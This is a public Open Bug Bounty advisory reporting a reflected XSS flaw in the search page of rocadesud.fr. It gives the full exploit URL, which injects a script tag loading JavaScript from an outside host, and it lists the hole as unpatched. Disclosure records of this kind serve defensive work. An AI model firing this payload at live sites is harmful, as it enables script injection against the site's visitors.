rocadesud.fr XSS vulnerability

2016-04-19T19:15:00
ID OBB:147448
Type openbugbounty
Reporter iwoodythecowboy
Modified 2016-07-12T20:12:00

Description

Vulnerable URL:
http://www.rocadesud.fr/rechercher.php?srch=t%22%3E%3Cscript%20src=https://openbugbounty.org/1.js%3E*0|tBerline*0|tBreak*0|tSUV*0|tCabriolet*0|tCoupe*0|tMonospace*0|tAncienne*0|tUtilitaire*0|marque*AUDI|gamme*|energie*|transmission*|km_mini*0|km_maxi*200000|px_mini*0|px_maxi*120000|
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 26.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4763100
VIP website status:| No
Check rocadesud.fr SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 April, 2016 19:15 GMT
Generic security notifications sent to website owner| 19 April, 2016 19:17 GMT
Vulnerability details disclosed by researcher| 12 July, 2016 20:12 GMT